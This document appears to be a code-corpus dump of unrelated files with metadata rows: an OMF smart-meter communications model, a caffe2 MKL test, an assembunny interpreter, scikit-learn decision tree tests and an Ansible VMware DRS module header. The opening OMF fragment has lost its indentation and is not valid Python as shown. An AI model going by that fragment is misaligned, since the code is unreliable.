comms.setRFCollectorCapacity(feeder, rfBandwidthCap=int(inputDict['rfCapacity']))
comms.setFiberCapacity(feeder, fiberBandwidthCap=int(inputDict['fiberCapacity']), setSubstationBandwidth=True)
comms.setRFEdgeCapacity(feeder)
#calculate the bandwidth use
comms.calcBandwidth(feeder)
comms.saveOmc(comms.graphGeoJson(feeder), modelDir, feederName)
#bandwidth capacity vs bandwidth use
overloadedFiber = []
for edge in nx.get_edge_attributes(feeder, 'fiber'):
if feeder[edge[0]][edge[1]].get('fiber',False):
if feeder[edge[0]][edge[1]]['bandwidthUse'] > feeder[edge[0]][edge[1]]['bandwidthCapacity']:
overloadedFiber.append(edge)
overloadedCollectors = []
for rfCollector in nx.get_node_attributes(feeder, 'rfCollector'):
if feeder.nodes[rfCollector].get('rfCollector',False):
if feeder.nodes[rfCollector]['bandwidthUse'] > feeder.nodes[rfCollector]['bandwidthCapacity']:
overloadedCollectors.append(rfCollector)
outData['overloadedFiber'] = overloadedFiber
outData['overloadedCollectors'] = overloadedCollectors
if len(overloadedFiber) == 0:
outData['fiberStatus'] = 'passed'
else:
outData['fiberStatus'] = 'insufficient'
if len(overloadedCollectors) == 0:
outData['collectorStatus'] = 'passed'
else:
outData['collectorStatus'] = 'insufficient'
#cost calculations
outData['fiber_cost'] = comms.getFiberCost(feeder, float(inputDict.get('fiber_cost', 0)))
outData['rf_collector_cost'] = comms.getrfCollectorsCost(feeder, float(inputDict.get('rf_collector_cost', 0)))
outData['smart_meter_cost'] = comms.getsmartMetersCost(feeder, float(inputDict.get('smart_meter_cost', 0)))
outData['total_cost'] = outData['fiber_cost'] + outData['rf_collector_cost'] + outData['smart_meter_cost']
outData["stdout"] = "Success"
outData["stderr"] = ""
return outData
def new(modelDir):
''' Create a new instance of this model. Returns true on success, false on failure. '''
defaultInputs = {
"modelType": modelName,
"fiberCapacity": 10**6,
"rfCapacity": 10**3*5,
"meterPacket": 10,
"feederName1":"Olin Barre LatLon",
"fiber_cost": 3,
"rf_collector_cost": 30000,
"smart_meter_cost": 1000,
"created":str(datetime.datetime.now())
}
creationCode = __neoMetaModel__.new(modelDir, defaultInputs)
try:
shutil.copyfile(pJoin(__neoMetaModel__._omfDir, 'static', 'publicFeeders', defaultInputs['feederName1']+'.omd'), pJoin(modelDir, defaultInputs['feederName1']+'.omd'))
except:
return False
return creationCode
@neoMetaModel_test_setup
def _tests():
# Location
modelLoc = pJoin(__neoMetaModel__._omfDir,"data","Model","admin","Automated Testing of " + modelName)
# Blow away old test results if necessary.
try:
shutil.rmtree(modelLoc)
except:
# No previous test results.
pass
# Create New.
new(modelLoc)
# Pre-run.
__neoMetaModel__.renderAndShow(modelLoc)
# Run the model.
__neoMetaModel__.runForeground(modelLoc)
# Show the output.
__neoMetaModel__.renderAndShow(modelLoc)
if __name__ == '__main__':
_tests()
| gpl-2.0 | 3,672,570,366,437,700,000 | 34.206612 | 168 | 0.731925 | false |
davinwang/caffe2 | caffe2/python/mkl/mkl_fc_op_test.py | 4 | 1753 | # Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import hypothesis.strategies as st
from hypothesis import given, settings
import numpy as np
from caffe2.python import core, workspace
import caffe2.python.hypothesis_test_util as hu
import caffe2.python.mkl_test_util as mu
@unittest.skipIf(not workspace.C.has_mkldnn,
"Skipping as we do not have mkldnn.")
class MKLFcTest(hu.HypothesisTestCase):
@given(n=st.integers(1, 5), m=st.integers(1, 5),
k=st.integers(1, 5), **mu.gcs)
def test_mkl_fc(self,n, m, k, gc, dc):
X = np.random.rand(m, k).astype(np.float32) - 0.5
W = np.random.rand(n, k).astype(np.float32) - 0.5
b = np.random.rand(n).astype(np.float32) - 0.5
op = core.CreateOperator(
'FC',
['X', 'W', 'b'],
["Y"]
)
self.assertDeviceChecks(dc, op, [X, W, b], [0])
if __name__ == "__main__":
import unittest
unittest.main()
| apache-2.0 | -8,658,453,736,706,285,000 | 32.711538 | 78 | 0.637764 | false |
mofr/advent-of-code | 2016/assembunny.py | 1 | 1444 | def run(source, out=None, **registers):
statements = list(map(lambda s: [s.split()[0], s.split()[1:]], source.split('\n')))
pc = 0
reg = {
'a': 0,
'b': 0,
'c': 0,
'd': 0,
}
reg.update(registers)
def val(arg):
if arg in reg:
return reg[arg]
else:
return int(arg)
while pc < len(statements):
op, args = statements[pc]
if op == 'cpy':
reg[args[1]] = val(args[0])
elif op == 'inc':
reg[args[0]] += 1
elif op == 'dec':
reg[args[0]] -= 1
elif op == 'jnz':
if val(args[0]) != 0:
pc += val(args[1])
continue
elif op == 'add':
reg[args[1]] += val(args[0])
elif op == 'addmult':
reg[args[2]] += val(args[0]) * val(args[1])
elif op == 'out':
if out(val(args[0])):
break
elif op == 'tgl':
index = val(args[0]) + pc
if 0 <= index < len(statements):
op, args = statements[index]
if len(args) == 1:
statements[index][0] = 'dec' if op == 'inc' else 'inc'
else:
statements[index][0] = 'cpy' if op == 'jnz' else 'jnz'
else:
raise Exception("Unknown instruction {} at line {}".format(op, pc))
pc += 1
return reg
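# Illustrative usage sketch: the three-line program below is a made-up example,
# not a real puzzle input. It copies 2 into register 'a' and counts it down to
# zero, so run() returns a register dict with a == 0 (b, c, d stay 0).
if __name__ == '__main__':
    demo_source = "cpy 2 a\ndec a\njnz a -1"
    print(run(demo_source))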
| apache-2.0 | -2,466,116,944,208,556,000 | 28.469388 | 87 | 0.40928 | false |
rahul-c1/scikit-learn | sklearn/tree/tests/test_tree.py | 6 | 29150 | """
Testing for the tree module (sklearn.tree).
"""
import pickle
import numpy as np
from functools import partial
from itertools import product
import platform
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_in
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_greater_equal
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import raises
from sklearn.utils.validation import check_random_state
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.tree import ExtraTreeClassifier
from sklearn.tree import ExtraTreeRegressor
from sklearn import tree
from sklearn import datasets
from sklearn.preprocessing._weights import _balance_weights
CLF_CRITERIONS = ("gini", "entropy")
REG_CRITERIONS = ("mse", )
CLF_TREES = {
"DecisionTreeClassifier": DecisionTreeClassifier,
"Presort-DecisionTreeClassifier": partial(DecisionTreeClassifier,
splitter="presort-best"),
"ExtraTreeClassifier": ExtraTreeClassifier,
}
REG_TREES = {
"DecisionTreeRegressor": DecisionTreeRegressor,
"Presort-DecisionTreeRegressor": partial(DecisionTreeRegressor,
splitter="presort-best"),
"ExtraTreeRegressor": ExtraTreeRegressor,
}
ALL_TREES = dict()
ALL_TREES.update(CLF_TREES)
ALL_TREES.update(REG_TREES)
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
# also load the iris dataset
# and randomly permute it
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification_toy():
"""Check classification on a toy dataset."""
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
clf = Tree(max_features=1, random_state=1)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
def test_weighted_classification_toy():
"""Check classification on a weighted toy dataset."""
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y, sample_weight=np.ones(len(X)))
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
clf.fit(X, y, sample_weight=np.ones(len(X)) * 0.5)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
def test_regression_toy():
"""Check regression on a toy dataset."""
for name, Tree in REG_TREES.items():
reg = Tree(random_state=1)
reg.fit(X, y)
assert_almost_equal(reg.predict(T), true_result,
err_msg="Failed with {0}".format(name))
        reg = Tree(max_features=1, random_state=1)
        reg.fit(X, y)
        assert_almost_equal(reg.predict(T), true_result,
                            err_msg="Failed with {0}".format(name))
def test_xor():
"""Check on a XOR problem"""
y = np.zeros((10, 10))
y[:5, :5] = 1
y[5:, 5:] = 1
gridx, gridy = np.indices(y.shape)
X = np.vstack([gridx.ravel(), gridy.ravel()]).T
y = y.ravel()
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0,
"Failed with {0}".format(name))
clf = Tree(random_state=0, max_features=1)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0,
"Failed with {0}".format(name))
def test_iris():
"""Check consistency on dataset iris."""
for (name, Tree), criterion in product(CLF_TREES.items(), CLF_CRITERIONS):
clf = Tree(criterion=criterion, random_state=0)
clf.fit(iris.data, iris.target)
score = accuracy_score(clf.predict(iris.data), iris.target)
assert_greater(score, 0.9,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
clf = Tree(criterion=criterion, max_features=2, random_state=0)
clf.fit(iris.data, iris.target)
score = accuracy_score(clf.predict(iris.data), iris.target)
assert_greater(score, 0.5,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
def test_boston():
"""Check consistency on dataset boston house prices."""
for (name, Tree), criterion in product(REG_TREES.items(), REG_CRITERIONS):
reg = Tree(criterion=criterion, random_state=0)
reg.fit(boston.data, boston.target)
score = mean_squared_error(boston.target, reg.predict(boston.data))
assert_less(score, 1,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
# using fewer features reduces the learning ability of this tree,
# but reduces training time.
reg = Tree(criterion=criterion, max_features=6, random_state=0)
reg.fit(boston.data, boston.target)
score = mean_squared_error(boston.target, reg.predict(boston.data))
assert_less(score, 2,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
def test_probability():
"""Predict probabilities using DecisionTreeClassifier."""
for name, Tree in CLF_TREES.items():
clf = Tree(max_depth=1, max_features=1, random_state=42)
clf.fit(iris.data, iris.target)
prob_predict = clf.predict_proba(iris.data)
assert_array_almost_equal(np.sum(prob_predict, 1),
np.ones(iris.data.shape[0]),
err_msg="Failed with {0}".format(name))
assert_array_equal(np.argmax(prob_predict, 1),
clf.predict(iris.data),
err_msg="Failed with {0}".format(name))
assert_almost_equal(clf.predict_proba(iris.data),
np.exp(clf.predict_log_proba(iris.data)), 8,
err_msg="Failed with {0}".format(name))
def test_arrayrepr():
"""Check the array representation."""
# Check resize
X = np.arange(10000)[:, np.newaxis]
y = np.arange(10000)
for name, Tree in REG_TREES.items():
reg = Tree(max_depth=None, random_state=0)
reg.fit(X, y)
def test_pure_set():
"""Check when y is pure."""
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [1, 1, 1, 1, 1, 1]
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(X, y)
assert_array_equal(clf.predict(X), y,
err_msg="Failed with {0}".format(name))
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
reg.fit(X, y)
        assert_almost_equal(reg.predict(X), y,
err_msg="Failed with {0}".format(name))
def test_numerical_stability():
"""Check numerical stability."""
X = np.array([
[152.08097839, 140.40744019, 129.75102234, 159.90493774],
[142.50700378, 135.81935120, 117.82884979, 162.75781250],
[127.28772736, 140.40744019, 129.75102234, 159.90493774],
[132.37025452, 143.71923828, 138.35694885, 157.84558105],
[103.10237122, 143.71928406, 138.35696411, 157.84559631],
[127.71276855, 143.71923828, 138.35694885, 157.84558105],
[120.91514587, 140.40744019, 129.75102234, 159.90493774]])
y = np.array(
[1., 0.70209277, 0.53896582, 0., 0.90914464, 0.48026916, 0.49622521])
with np.errstate(all="raise"):
for name, Tree in REG_TREES.items():
reg = Tree(random_state=0)
reg.fit(X, y)
reg.fit(X, -y)
reg.fit(-X, y)
reg.fit(-X, -y)
def test_importances():
"""Check variable importances."""
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=0)
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
importances = clf.feature_importances_
n_important = np.sum(importances > 0.1)
assert_equal(importances.shape[0], 10, "Failed with {0}".format(name))
assert_equal(n_important, 3, "Failed with {0}".format(name))
X_new = clf.transform(X, threshold="mean")
assert_less(0, X_new.shape[1], "Failed with {0}".format(name))
assert_less(X_new.shape[1], X.shape[1], "Failed with {0}".format(name))
# Check on iris that importances are the same for all builders
clf = DecisionTreeClassifier(random_state=0)
clf.fit(iris.data, iris.target)
clf2 = DecisionTreeClassifier(random_state=0,
max_leaf_nodes=len(iris.data))
clf2.fit(iris.data, iris.target)
assert_array_equal(clf.feature_importances_,
clf2.feature_importances_)
@raises(ValueError)
def test_importances_raises():
"""Check if variable importance before fit raises ValueError. """
clf = DecisionTreeClassifier()
clf.feature_importances_
def test_importances_gini_equal_mse():
"""Check that gini is equivalent to mse for binary output variable"""
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=0)
# The gini index and the mean square error (variance) might differ due
    # to numerical instability. Since those instabilities mainly occur at
# high tree depth, we restrict this maximal depth.
clf = DecisionTreeClassifier(criterion="gini", max_depth=5,
random_state=0).fit(X, y)
reg = DecisionTreeRegressor(criterion="mse", max_depth=5,
random_state=0).fit(X, y)
assert_almost_equal(clf.feature_importances_, reg.feature_importances_)
assert_array_equal(clf.tree_.feature, reg.tree_.feature)
assert_array_equal(clf.tree_.children_left, reg.tree_.children_left)
assert_array_equal(clf.tree_.children_right, reg.tree_.children_right)
assert_array_equal(clf.tree_.n_node_samples, reg.tree_.n_node_samples)
def test_max_features():
"""Check max_features."""
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(max_features="auto")
reg.fit(boston.data, boston.target)
assert_equal(reg.max_features_, boston.data.shape[1])
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(max_features="auto")
clf.fit(iris.data, iris.target)
assert_equal(clf.max_features_, 2)
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_features="sqrt")
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(np.sqrt(iris.data.shape[1])))
est = TreeEstimator(max_features="log2")
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(np.log2(iris.data.shape[1])))
est = TreeEstimator(max_features=1)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 1)
est = TreeEstimator(max_features=3)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 3)
est = TreeEstimator(max_features=0.01)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 1)
est = TreeEstimator(max_features=0.5)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(0.5 * iris.data.shape[1]))
est = TreeEstimator(max_features=1.0)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, iris.data.shape[1])
est = TreeEstimator(max_features=None)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, iris.data.shape[1])
# use values of max_features that are invalid
est = TreeEstimator(max_features=10)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=-1)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=0.0)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=1.5)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features="foobar")
assert_raises(ValueError, est.fit, X, y)
def test_error():
"""Test that it gives proper exception on deficient input."""
for name, TreeEstimator in CLF_TREES.items():
# predict before fit
est = TreeEstimator()
assert_raises(Exception, est.predict_proba, X)
est.fit(X, y)
X2 = [-2, -1, 1] # wrong feature shape for sample
assert_raises(ValueError, est.predict_proba, X2)
for name, TreeEstimator in ALL_TREES.items():
# Invalid values for parameters
assert_raises(ValueError, TreeEstimator(min_samples_leaf=-1).fit, X, y)
assert_raises(ValueError,
TreeEstimator(min_weight_fraction_leaf=-1).fit,
X, y)
assert_raises(ValueError,
TreeEstimator(min_weight_fraction_leaf=0.51).fit,
X, y)
assert_raises(ValueError, TreeEstimator(min_samples_split=-1).fit,
X, y)
assert_raises(ValueError, TreeEstimator(max_depth=-1).fit, X, y)
assert_raises(ValueError, TreeEstimator(max_features=42).fit, X, y)
# Wrong dimensions
est = TreeEstimator()
y2 = y[:-1]
assert_raises(ValueError, est.fit, X, y2)
# Test with arrays that are non-contiguous.
Xf = np.asfortranarray(X)
est = TreeEstimator()
est.fit(Xf, y)
assert_almost_equal(est.predict(T), true_result)
# predict before fitting
est = TreeEstimator()
assert_raises(Exception, est.predict, T)
# predict on vector with different dims
est.fit(X, y)
t = np.asarray(T)
assert_raises(ValueError, est.predict, t[:, 1:])
# wrong sample shape
Xt = np.array(X).T
est = TreeEstimator()
est.fit(np.dot(X, Xt), y)
assert_raises(ValueError, est.predict, X)
clf = TreeEstimator()
clf.fit(X, y)
assert_raises(ValueError, clf.predict, Xt)
def test_min_samples_leaf():
"""Test if leaves contain more than leaf_count training examples"""
X = np.asfortranarray(iris.data.astype(tree._tree.DTYPE))
y = iris.target
# test both DepthFirstTreeBuilder and BestFirstTreeBuilder
# by setting max_leaf_nodes
for max_leaf_nodes in (None, 1000):
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(min_samples_leaf=5,
max_leaf_nodes=max_leaf_nodes,
random_state=0)
est.fit(X, y)
out = est.tree_.apply(X)
node_counts = np.bincount(out)
# drop inner nodes
leaf_count = node_counts[node_counts != 0]
assert_greater(np.min(leaf_count), 4,
"Failed with {0}".format(name))
def test_min_weight_fraction_leaf():
"""Test if leaves contain at least min_weight_fraction_leaf of the
training set"""
X = np.asfortranarray(iris.data.astype(tree._tree.DTYPE))
y = iris.target
rng = np.random.RandomState(0)
weights = rng.rand(X.shape[0])
total_weight = np.sum(weights)
# test both DepthFirstTreeBuilder and BestFirstTreeBuilder
# by setting max_leaf_nodes
for max_leaf_nodes, name, frac in product((None, 1000),
ALL_TREES,
np.linspace(0, 0.5, 6)):
TreeEstimator = ALL_TREES[name]
est = TreeEstimator(min_weight_fraction_leaf=frac,
max_leaf_nodes=max_leaf_nodes,
random_state=0)
est.fit(X, y, sample_weight=weights)
out = est.tree_.apply(X)
node_weights = np.bincount(out, weights=weights)
# drop inner nodes
leaf_weights = node_weights[node_weights != 0]
assert_greater_equal(
np.min(leaf_weights),
total_weight * est.min_weight_fraction_leaf,
"Failed with {0} "
"min_weight_fraction_leaf={1}".format(
name, est.min_weight_fraction_leaf))
def test_pickle():
"""Check that tree estimator are pickable """
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(iris.data, iris.target)
score = clf.score(iris.data, iris.target)
serialized_object = pickle.dumps(clf)
clf2 = pickle.loads(serialized_object)
assert_equal(type(clf2), clf.__class__)
score2 = clf2.score(iris.data, iris.target)
assert_equal(score, score2, "Failed to generate same score "
"after pickling (classification) "
"with {0}".format(name))
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
reg.fit(boston.data, boston.target)
score = reg.score(boston.data, boston.target)
serialized_object = pickle.dumps(reg)
reg2 = pickle.loads(serialized_object)
assert_equal(type(reg2), reg.__class__)
score2 = reg2.score(boston.data, boston.target)
assert_equal(score, score2, "Failed to generate same score "
"after pickling (regression) "
"with {0}".format(name))
def test_multioutput():
"""Check estimators on multi-output problems."""
X = [[-2, -1],
[-1, -1],
[-1, -2],
[1, 1],
[1, 2],
[2, 1],
[-2, 1],
[-1, 1],
[-1, 2],
[2, -1],
[1, -1],
[1, -2]]
y = [[-1, 0],
[-1, 0],
[-1, 0],
[1, 1],
[1, 1],
[1, 1],
[-1, 2],
[-1, 2],
[-1, 2],
[1, 3],
[1, 3],
[1, 3]]
T = [[-1, -1], [1, 1], [-1, 1], [1, -1]]
y_true = [[-1, 0], [1, 1], [-1, 2], [1, 3]]
# toy classification problem
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
y_hat = clf.fit(X, y).predict(T)
assert_array_equal(y_hat, y_true)
assert_equal(y_hat.shape, (4, 2))
proba = clf.predict_proba(T)
assert_equal(len(proba), 2)
assert_equal(proba[0].shape, (4, 2))
assert_equal(proba[1].shape, (4, 4))
log_proba = clf.predict_log_proba(T)
assert_equal(len(log_proba), 2)
assert_equal(log_proba[0].shape, (4, 2))
assert_equal(log_proba[1].shape, (4, 4))
# toy regression problem
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
y_hat = reg.fit(X, y).predict(T)
assert_almost_equal(y_hat, y_true)
assert_equal(y_hat.shape, (4, 2))
def test_classes_shape():
"""Test that n_classes_ and classes_ have proper shape."""
for name, TreeClassifier in CLF_TREES.items():
# Classification, single output
clf = TreeClassifier(random_state=0)
clf.fit(X, y)
assert_equal(clf.n_classes_, 2)
assert_array_equal(clf.classes_, [-1, 1])
# Classification, multi-output
_y = np.vstack((y, np.array(y) * 2)).T
clf = TreeClassifier(random_state=0)
clf.fit(X, _y)
assert_equal(len(clf.n_classes_), 2)
assert_equal(len(clf.classes_), 2)
assert_array_equal(clf.n_classes_, [2, 2])
assert_array_equal(clf.classes_, [[-1, 1], [-2, 2]])
def test_unbalanced_iris():
"""Check class rebalancing."""
unbalanced_X = iris.data[:125]
unbalanced_y = iris.target[:125]
sample_weight = _balance_weights(unbalanced_y)
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(unbalanced_X, unbalanced_y, sample_weight=sample_weight)
assert_almost_equal(clf.predict(unbalanced_X), unbalanced_y)
def test_memory_layout():
"""Check that it works no matter the memory layout"""
for (name, TreeEstimator), dtype in product(ALL_TREES.items(),
[np.float64, np.float32]):
est = TreeEstimator(random_state=0)
# Nothing
X = np.asarray(iris.data, dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# C-order
X = np.asarray(iris.data, order="C", dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# F-order
X = np.asarray(iris.data, order="F", dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# Contiguous
X = np.ascontiguousarray(iris.data, dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# Strided
X = np.asarray(iris.data[::3], dtype=dtype)
y = iris.target[::3]
assert_array_equal(est.fit(X, y).predict(X), y)
def test_sample_weight():
"""Check sample weighting."""
# Test that zero-weighted samples are not taken into account
X = np.arange(100)[:, np.newaxis]
y = np.ones(100)
y[:50] = 0.0
sample_weight = np.ones(100)
sample_weight[y == 0] = 0.0
clf = DecisionTreeClassifier(random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X), np.ones(100))
# Test that low weighted samples are not taken into account at low depth
X = np.arange(200)[:, np.newaxis]
y = np.zeros(200)
y[50:100] = 1
y[100:200] = 2
X[100:200, 0] = 200
sample_weight = np.ones(200)
sample_weight[y == 2] = .51 # Samples of class '2' are still weightier
clf = DecisionTreeClassifier(max_depth=1, random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_equal(clf.tree_.threshold[0], 149.5)
sample_weight[y == 2] = .5 # Samples of class '2' are no longer weightier
clf = DecisionTreeClassifier(max_depth=1, random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_equal(clf.tree_.threshold[0], 49.5) # Threshold should have moved
# Test that sample weighting is the same as having duplicates
X = iris.data
y = iris.target
duplicates = rng.randint(0, X.shape[0], 200)
clf = DecisionTreeClassifier(random_state=1)
clf.fit(X[duplicates], y[duplicates])
sample_weight = np.bincount(duplicates, minlength=X.shape[0])
clf2 = DecisionTreeClassifier(random_state=1)
clf2.fit(X, y, sample_weight=sample_weight)
internal = clf.tree_.children_left != tree._tree.TREE_LEAF
assert_array_almost_equal(clf.tree_.threshold[internal],
clf2.tree_.threshold[internal])
def test_sample_weight_invalid():
"""Check sample weighting raises errors."""
X = np.arange(100)[:, np.newaxis]
y = np.ones(100)
y[:50] = 0.0
clf = DecisionTreeClassifier(random_state=0)
sample_weight = np.random.rand(100, 1)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.array(0)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.ones(101)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.ones(99)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
def test_max_leaf_nodes():
"""Test greedy trees with max_depth + 1 leafs. """
from sklearn.tree._tree import TREE_LEAF
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_depth=None, max_leaf_nodes=k + 1).fit(X, y)
tree = est.tree_
assert_equal((tree.children_left == TREE_LEAF).sum(), k + 1)
# max_leaf_nodes in (0, 1) should raise ValueError
est = TreeEstimator(max_depth=None, max_leaf_nodes=0)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_depth=None, max_leaf_nodes=1)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_depth=None, max_leaf_nodes=0.1)
assert_raises(ValueError, est.fit, X, y)
def test_max_leaf_nodes_max_depth():
"""Test preceedence of max_leaf_nodes over max_depth. """
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_depth=1, max_leaf_nodes=k).fit(X, y)
tree = est.tree_
assert_greater(tree.max_depth, 1)
def test_arrays_persist():
"""Ensure property arrays' memory stays alive when tree disappears
non-regression for #2726
"""
for attr in ['n_classes', 'value', 'children_left', 'children_right',
'threshold', 'impurity', 'feature', 'n_node_samples']:
value = getattr(DecisionTreeClassifier().fit([[0]], [0]).tree_, attr)
# if pointing to freed memory, contents may be arbitrary
assert_true(-2 <= value.flat[0] < 2,
'Array points to arbitrary memory')
def test_only_constant_features():
random_state = check_random_state(0)
X = np.zeros((10, 20))
y = random_state.randint(0, 2, (10, ))
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(random_state=0)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 0)
def test_with_only_one_non_constant_features():
X = np.hstack([np.array([[1.], [1.], [0.], [0.]]),
np.zeros((4, 1000))])
y = np.array([0., 1., 0., 1.0])
for name, TreeEstimator in CLF_TREES.items():
est = TreeEstimator(random_state=0, max_features=1)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 1)
assert_array_equal(est.predict_proba(X), 0.5 * np.ones((4, 2)))
for name, TreeEstimator in REG_TREES.items():
est = TreeEstimator(random_state=0, max_features=1)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 1)
assert_array_equal(est.predict(X), 0.5 * np.ones((4, )))
def test_big_input():
"""Test if the warning for too large inputs is appropriate."""
X = np.repeat(10 ** 40., 4).astype(np.float64).reshape(-1, 1)
clf = DecisionTreeClassifier()
try:
clf.fit(X, [0, 1, 0, 1])
except ValueError as e:
assert_in("float32", str(e))
def test_realloc():
from sklearn.tree._tree import _realloc_test
assert_raises(MemoryError, _realloc_test)
def test_huge_allocations():
n_bits = int(platform.architecture()[0].rstrip('bit'))
X = np.random.randn(10, 2)
y = np.random.randint(0, 2, 10)
# Sanity check: we cannot request more memory than the size of the address
# space. Currently raises OverflowError.
huge = 2 ** (n_bits + 1)
clf = DecisionTreeClassifier(splitter='best', max_leaf_nodes=huge)
assert_raises(Exception, clf.fit, X, y)
# Non-regression test: MemoryError used to be dropped by Cython
# because of missing "except *".
huge = 2 ** (n_bits - 1) - 1
clf = DecisionTreeClassifier(splitter='best', max_leaf_nodes=huge)
assert_raises(MemoryError, clf.fit, X, y)
| bsd-3-clause | -7,347,510,510,261,935,000 | 34.505481 | 79 | 0.589434 | false |
t794104/ansible | lib/ansible/modules/cloud/vmware/vmware_drs_rule_facts.py | 6 | 9472 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_drs_rule_facts
short_description: Gathers facts about DRS rule on the given cluster
description:
- 'This module can be used to gather facts about DRS VM-VM and VM-HOST rules from the given cluster.'
version_added: '2.5'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster.
